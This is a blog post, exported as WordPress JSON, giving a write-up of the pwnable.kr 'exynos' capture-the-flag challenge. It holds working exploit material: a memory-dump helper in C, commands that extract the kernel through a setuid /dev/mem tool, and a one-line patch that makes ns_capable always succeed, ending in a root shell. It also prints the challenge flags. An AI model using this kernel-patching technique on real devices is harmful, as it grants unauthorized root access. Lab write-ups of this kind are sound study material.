{"id":3285,"date":"2025-04-11T01:27:26","date_gmt":"2025-04-10T16:27:26","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3285"},"modified":"2025-04-11T01:27:28","modified_gmt":"2025-04-10T16:27:28","slug":"exynos","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3285","title":{"rendered":"exynos"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">How did Samsung accidentally mess up their phone?\n\n* there is gcc environment inside the QEMU box.\n* no debugging environment is provided.\n\nssh exynos@pwnable.kr -p2222 (pw: flag of syscall)<\/pre>\n\n\n\n<p>(pw: <code>Must_san1tize_Us3r_p0int3r<\/code>)<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Analysis<\/h1>\n\n\n\n<p>Looking at the files, there is an executable named <code>exynos-mem<\/code>.<\/p>\n\n\n\n<p>Its permissions are <strong>4<\/strong>775, so the <strong>setuid<\/strong> <strong>bit<\/strong> is set. 
Therefore, even when a normal user runs it, it executes with root privileges.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/ $ ls -la\ntotal 607\ndrwxr-xr-x   14 0        0             1024 Apr 10 13:21 .\ndrwxr-xr-x   14 0        0             1024 Apr 10 13:21 ..\n-rw-------    1 0        1000           111 Apr 10 14:25 .ash_history\ndrwxr-xr-x    2 0        0             2048 Jul 11  2014 bin\ndrwxr-xr-x    2 0        0             1024 Jul 11  2014 boot\ndrwxr-xr-x    2 0        0             1024 Apr 10 12:16 dev\ndrwxr-xr-x    3 0        0             1024 Jul 11  2014 etc\n-rwsrwxr-x    1 0        0           589585 Nov 24  2015 exynos-mem\ndrwxr-xr-x    6 0        0             1024 Nov 19  2016 lib\nlrwxrwxrwx    1 0        0               11 Jul 11  2014 linuxrc -> bin\/busybox\ndrwx------    2 0        0            12288 Jul 11  2014 lost+found\ndr-xr-xr-x   43 0        0                0 Jan  1  1970 proc\ndrwx------    2 0        0             1024 Apr  5 08:57 root\ndrwxr-xr-x    2 0        0             2048 Jul 11  2014 sbin\ndrwxr-xr-x    2 0        0             1024 Jul 11  2014 sys\ndrwxrwxrwx    2 0        0             1024 Apr 10 13:20 tmp\ndrwxr-xr-x    6 0        0             1024 Jul 11  2014 usr\n\n\/ $ stat \/exynos-mem \n  File: \/exynos-mem\n  Size: 589585    \tBlocks: 1160       IO Block: 1024   regular file\nDevice: 100h\/256d\tInode: 30          Links: 1\nAccess: (4775\/-rwsrwxr-x)  Uid: (    0\/ UNKNOWN)   Gid: (    0\/ UNKNOWN)\nAccess: 2025-04-10 12:37:45.000000000\nModify: 2015-11-24 18:59:20.000000000\nChange: 2015-11-25 09:59:45.000000000<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Decompiled src<\/h3>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li>exynos-mem<\/li>\n<\/ul>\n\n\n\n<p><code>\/dev\/mem<\/code> is a device file that gives user space direct access to every region of physical memory.<\/p>\n\n\n\n<p><strong>The arguments are parsed as follows.<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>argv[1]<\/code> \u2192 physical address to read or write<\/li>\n\n\n\n<li><code>argv[2]<\/code> \u2192 number of bytes to read or write<\/li>\n\n\n\n<li><code>argv[3]<\/code> \u2192 mode: <strong><code>0<\/code><\/strong>=read, <strong><code>1<\/code><\/strong>=write<\/li>\n<\/ul>\n\n\n\n<p>For example, it can be used as follows (note that the binary parses its arguments with <code>atoi<\/code>, so in practice the address and size must be given in decimal, as in the commands further down).<\/p>\n\n\n\n<p>Example:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># Read 256 bytes from physical address 0x1000 and dump them to stdout\n\/exynos-mem 0x1000 256 0\n\n# Read data from stdin and write 128 bytes to physical address 0x2000\necho -n \"\\x01\\x02\\x03...\" | \/exynos-mem 0x2000 128 1<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  int v5; \/\/ [sp+8h] [bp-1Ch]\n  int v6; \/\/ [sp+8h] 
[bp-1Ch]\n  int v7; \/\/ [sp+Ch] [bp-18h]\n  int v8; \/\/ [sp+10h] [bp-14h]\n  int v9; \/\/ [sp+14h] [bp-10h]\n  int v10; \/\/ [sp+18h] [bp-Ch]\n  int v11; \/\/ [sp+1Ch] [bp-8h]\n\n  if ( argc == 4 )\n  {\n    v7 = open(\"\/dev\/mem\", 2, envp);\n    v8 = atoi(argv[1]);\n    v9 = atoi(argv[2]);\n    v10 = atoi(argv[3]);\n    lseek(v7, v8, 0);\n    v11 = malloc(v9);\n    v5 = 0;\n    if ( v10 )\n    {\n      if ( v10 == 1 )\n      {\n        read(0, v11, v9);\n        v5 = write(v7, v11, v9);\n      }\n      else\n      {\n        fwrite(\"wrong mode. 0:read, 1:write\\n\", 1, 28, stderr);\n      }\n      fprintf(stderr, \"processed %d bytes\\n\", v5);\n    }\n    else\n    {\n      read(v7, v11, v9);\n      v6 = write(1, v11, v9);\n      fprintf(stderr, \"processed %d bytes\\n\", v6);\n    }\n  }\n  else\n  {\n    puts(\"usage : exynos-mem [phyaddr] [bytesize] [mode(R\/W-0\/1)]\", argv, envp);\n  }\n  return 0;\n}<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Solution<\/h1>\n\n\n\n<p>It appears that Exynos-based Galaxy S3 devices once had a vulnerability that let a normal user read and write physical memory.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/FSecureLABS\/mercury-modules\/blob\/master\/metall0id\/root\/exynosmem\/exynos-abuse\/jni\/exynos-abuse.c\">https:\/\/github.com\/FSecureLABS\/mercury-modules\/blob\/master\/metall0id\/root\/exynosmem\/exynos-abuse\/jni\/exynos-abuse.c<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/xdaforums.com\/t\/root-security-root-exploit-on-exynos.2048511\">https:\/\/xdaforums.com\/t\/root-security-root-exploit-on-exynos.2048511<\/a><\/p>\n\n\n\n<p>Since memory can be read and written with no regard for the kernel's R\/W\/X segment boundaries, modifying kernel code was entirely feasible.<\/p>\n\n\n\n<p>My initial idea was as follows.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Read physical memory through <code>\/exynos-mem<\/code> to extract the kernel<\/li>\n\n\n\n<li>Encode the extracted data as base64 and print it to the terminal<\/li>\n\n\n\n<li>Copy and paste the printed output and decode it<\/li>\n\n\n\n<li>Patch <code>ns_capable<\/code> and call <code>setresuid(0,0,0);<\/code> to escalate to root<\/li>\n<\/ol>\n\n\n\n<p>First, write and compile the code in the <code>\/tmp<\/code> directory.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cd \/tmp;\nvi dump.c\n(write the dump.c code)\ngcc -o dump dump.c<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>dump.c<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;stdlib.h>\n#include &lt;unistd.h>\n#include &lt;fcntl.h>\n\n\/\/ path of the target binary to execute\n#define TARGET_PROGRAM \"\/exynos-mem\"\n\nint main(int argc, char *argv[]) {\n    if (argc != 4) {\n        fprintf(stderr, \"\uc0ac\uc6a9\ubc95: %s [\ubb3c\ub9ac\uc8fc\uc18c] [\ubc14\uc774\ud2b8\uc218] [\ubaa8\ub4dc(0:\uc77d\uae30, 1:\uc4f0\uae30)]\\n\", argv[0]);\n        return 1;\n    }\n\n    int fd = open(\"mem_dump.bin\", O_CREAT | O_WRONLY | 
O_TRUNC, 0644);\n    if (fd &lt; 0) {\n        perror(\"open\");\n        return 1;\n    }\n\n    \/\/ redirect stdout (1) into the output file\n    if (dup2(fd, STDOUT_FILENO) &lt; 0) {\n        perror(\"dup2\");\n        close(fd);\n        return 1;\n    }\n\n    close(fd);\n\n    \/\/ build the argument vector for execvp\n    char *args[] = {\n        TARGET_PROGRAM,\n        argv[1],  \/\/ physical address\n        argv[2],  \/\/ byte count\n        argv[3],  \/\/ mode (0: read, 1: write)\n        NULL\n    };\n\n\/\/ chunk start addresses used below: 0x60000000 + 1000000 * n, computed in a Python REPL\n\/\/ >>> 0x60000000+1000000*0\n\/\/ 1610612736 (0x60000000)\n\n\/\/ >>> 0x60000000+1000000*1\n\/\/ 1611612736 (0x600f4240)\n\n\/\/ >>> 0x60000000+1000000*2\n\/\/ 1612612736 (0x601e8480)\n\n\/\/ >>> 0x60000000+1000000*3\n\/\/ 1613612736 (0x602dc6c0)\n\n\/\/ >>> 0x60000000+1000000*4\n\/\/ 1614612736 (0x603d0900)\n\n\/\/ >>> 0x60000000+1000000*5\n\/\/ 1615612736 (0x604c4b40)\n\n\/\/ >>> 0x60000000+1000000*6\n\/\/ 1616612736 (0x605b8d80)\n\n\n    \/\/ run the target program\n    execvp(args[0], args);\n\n    \/\/ only reached if execvp fails\n    perror(\"execvp\");\n    return 1;\n}<\/pre>\n\n\n\n<p>Now some tedious manual work is required.<\/p>\n\n\n\n<p>After building the dump executable, only about 1.4M of free space remained, so the kernel cannot be extracted in one go. 
It therefore had to be repeated about 7 times.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/tmp $ df -h\nFilesystem                Size      Used Available Use% Mounted on\n\/dev\/root.old            46.5M     42.6M      1.4M  97% \/<\/pre>\n\n\n\n<p>The physical address of the kernel to be extracted can be obtained from <code>\/proc\/iomem<\/code>.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/tmp $ cat \/proc\/iomem\n(...)\n60000000-66dfffff : System RAM\n  60008000-60485f3f : Kernel code\n  604ba000-605065cf : Kernel data<\/pre>\n\n\n\n<p>This takes about 7 rounds.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cd \/tmp;\n.\/dump 1610612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(fetch the encoded output)\n\n.\/dump 1611612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(fetch the encoded output)\n\n.\/dump 1612612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(fetch the encoded output)\n\n.\/dump 1613612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(fetch the encoded output)\n\n.\/dump 
1614612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(fetch the encoded output)\n\n.\/dump 1615612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(fetch the encoded output)\n\n.\/dump 1616612736 1000000 0\nbase64 .\/mem_dump.bin &amp;&amp; rm mem_dump.bin\n(fetch the encoded output)<\/pre>\n\n\n\n<p>Paste all of the extracted data, decode it, and combine it into a single file.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">base64 -d 0x60000000.base64 > sram.bin\nbase64 -d 0x600f4240.base64 >> sram.bin\nbase64 -d 0x601e8480.base64 >> sram.bin\nbase64 -d 0x602dc6c0.base64 >> sram.bin\nbase64 -d 0x603d0900.base64 >> sram.bin\nbase64 -d 0x604c4b40.base64 >> sram.bin\nbase64 -d 0x605b8d80.base64 >> sram.bin<\/pre>\n\n\n\n<p>Open the dumped kernel in IDA Pro.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>ARM Little-endian<\/strong><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"747\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5-1024x747.png\" alt=\"\" class=\"wp-image-3286\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5-1024x747.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5-300x219.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5-768x561.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5-1536x1121.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-5.png 1666w\" 
sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Since <code>60000000-66dfffff : System RAM<\/code>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>ROM\u2019s start address: <code>0x60000000<\/code><\/strong><\/li>\n\n\n\n<li><strong>Input file\u2019s Loading address: <code>0x60000000<\/code><\/strong><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"849\" height=\"1024\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-6-849x1024.png\" alt=\"\" class=\"wp-image-3287\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-6-849x1024.png 849w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-6-249x300.png 249w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-6-768x926.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-6.png 1260w\" sizes=\"auto, (max-width: 849px) 100vw, 849px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>32-bit mode (No)<\/strong><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"474\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-7-1024x474.png\" alt=\"\" class=\"wp-image-3288\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-7-1024x474.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-7-300x139.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-7-768x355.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-7.png 1232w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><code>ns_capable<\/code> patch<\/h3>\n\n\n\n<p>The problem is that the kernel has no symbols, so we do not know at which address the function lives.<\/p>\n\n\n\n<p>The kernel version is shown below, so I downloaded the Raspberry Pi image of the matching version and extracted the kernel from it for comparison.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/tmp $ uname -a\nLinux (none) 3.11.4 #13 SMP Fri Jul 11 00:48:31 PDT 2014 armv7l GNU\/Linux<\/pre>\n\n\n\n<p><a href=\"https:\/\/downloads.raspberrypi.org\/raspbian\/images\/raspbian-2014-09-12\">https:\/\/downloads.raspberrypi.org\/raspbian\/images\/raspbian-2014-09-12<\/a><\/p>\n\n\n\n<p>Extract the kernel.img file from 2014-09-09-wheezy-raspbian.img and use the vmlinux-to-elf tool to turn it into an ELF file with its symbols preserved.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/marin-m\/vmlinux-to-elf\">https:\/\/github.com\/marin-m\/vmlinux-to-elf<\/a><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@2d0f4d9a440c:~\/pwnable.kr\/exynos\/vmlinux-to-elf$ .\/vmlinux-to-elf .\/kernel.img kernel2.elf\n[+] Kernel successfully decompressed in-memory (the offsets that follow will be given relative to the decompressed binary)\n[+] Version string: Linux version 3.12.28+ (dc4@dc4-XPS13-9333) (gcc version 4.8.3 20140303 (prerelease) (crosstool-NG linaro-1.13.1+bzr2650 - Linaro GCC 2014.03) ) #709 PREEMPT Mon Sep 8 15:28:00 BST 2014\n[+] Guessed architecture: armle successfully in 7.09 seconds\n[+] Found kallsyms_token_table at file offset 0x00519ae0\n[+] Found kallsyms_token_index at file offset 0x00519e50\n[+] Found kallsyms_markers at file offset 
0x00519820\n[+] Found kallsyms_names at file offset 0x0049b630\n[+] Found kallsyms_num_syms at file offset 0x0049b620\n[i] Null addresses overall: 0 %\n[+] Found kallsyms_addresses at file offset 0x0046f640\n[+] Base address fallback, using first_symbol_virtual_address (c0008000)\n[+] Successfully wrote the new ELF kernel to kernel2.elf<\/pre>\n\n\n\n<p>Raspberry Pi kernel version info:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Linux version 3.12.28+ (dc4@dc4-XPS13-9333) (gcc version 4.8.3 20140303 (prerelease) (crosstool-NG linaro-1.13.1+bzr2650 - Linaro GCC 2014.03) ) #709 PREEMPT Mon Sep 8 15:28:00 BST 2014<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>ns_capable<\/strong><\/h3>\n\n\n\n<p>This is a helper function that checks whether the current task holds the specified capability in a given user namespace.<\/p>\n\n\n\n<p>Its return type is <code>bool<\/code>: <strong>it returns <code>true<\/code> if the capability is held and <code>false<\/code> otherwise<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"609\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8-1024x609.png\" alt=\"\" class=\"wp-image-3289\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8-1024x609.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8-300x178.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8-768x457.png 768w, 
https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8-1536x913.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-8.png 1870w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>All that is needed is to patch <code>ns_capable<\/code> so that its return value is always 1.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1020\" height=\"588\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-9.png\" alt=\"\" class=\"wp-image-3290\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-9.png 1020w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-9-300x173.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-9-768x443.png 768w\" sizes=\"auto, (max-width: 1020px) 100vw, 1020px\" \/><\/figure>\n\n\n\n<p>Copying the opcode bytes of the <code>ns_capable<\/code> epilogue verbatim and searching for them in the kernel extracted from the challenge server turns up exactly one match.<\/p>\n\n\n\n<p><code>00 00 A0 13 0C 20 93 05 01 2C 82 03 0C 20 83 05<\/code><\/p>\n\n\n\n<p>The function at address <code>0x600278B0<\/code> is <code>ns_capable<\/code>.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ROM:600278EC 00 00 A0 13                             MOVNE           R0, #0\nROM:600278F0 0C 20 93 05                             LDREQ           R2, [R3,#0xC]\nROM:600278F4 01 2C 82 03                             ORREQ           R2, R2, #0x100\nROM:600278F8 0C 20 83 05                             STREQ           R2, [R3,#0xC]<\/pre>\n\n\n\n<figure 
class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"148\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-10-1024x148.png\" alt=\"\" class=\"wp-image-3291\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-10-1024x148.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-10-300x43.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-10-768x111.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-10.png 1356w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Patch <code>sub_600278B0<\/code> so that it always returns 1 regardless of the <code>if (v5)<\/code> branch.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"706\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-11-1024x706.png\" alt=\"\" class=\"wp-image-3292\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-11-1024x706.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-11-300x207.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-11-768x529.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-11.png 1204w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Patching the opcode at address <code>0x600278EC<\/code> to <code>MOV R0, #1<\/code> does the job. 
<br>(<code>MOV R0, #1<\/code> \u2192 <code>\\x01\\x00\\xA0\\xE3<\/code>)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"228\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12-1024x228.png\" alt=\"\" class=\"wp-image-3293\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12-1024x228.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12-300x67.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12-768x171.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12-1536x342.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12.png 1754w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Running the following applies the patch.<\/p>\n\n\n\n<p><code>0x600278EC = 1610774764<\/code><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">echo -e \"\\x01\\x00\\xA0\\xE3\" | \/exynos-mem 1610774764 4 1<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sh: can't access tty; job control turned off\n\/ $ cd \/tmp\n\/tmp $ vi shell.c\n\/tmp $ cat shell.c\n#include &lt;unistd.h>\n\nint main(){\n    setresuid(0,0,0);\n    system(\"\/bin\/sh\");\n    return 0;\n}\n\/tmp $ gcc -o shell shell.c\n\/tmp $ echo -e \"\\x01\\x00\\xA0\\xE3\" | \/exynos-mem 1610774764 4 1\nprocessed 4 bytes\n\/tmp $ .\/shell\n\/bin\/sh: can't access tty; job control turned off\n\/tmp # id\nuid=0 gid=1000 groups=1000\n\/tmp # cd \/root\n\/root # ls\nflag\n\/root # 
cat flag\nr3ad_Writ3_kernel_m3mory_as_1_want\n\/root # <\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Description (pw: Must_san1tize_Us3r_p0int3r) Analysis Looking at the files, there is an executable named exynos-mem. Its permissions are 4775, so the setuid bit is set. Therefore, even when a normal user runs it, it executes with root privileges. Decompiled src \/dev\/mem is a device file that gives user space direct access to every region of physical memory. The arguments are parsed as follows. For example, it can be used as follows. 
Example: Solution It appears that Exynos-based&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3285\" rel=\"bookmark\">Read more &raquo;<span class=\"screen-reader-text\">exynos<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3285","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3285","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3285"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3285\/revisions"}],"predecessor-version":[{"id":3294,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3285\/revisions\/3294"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3285"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3285"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3285"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/
{rel}","templated":true}]}}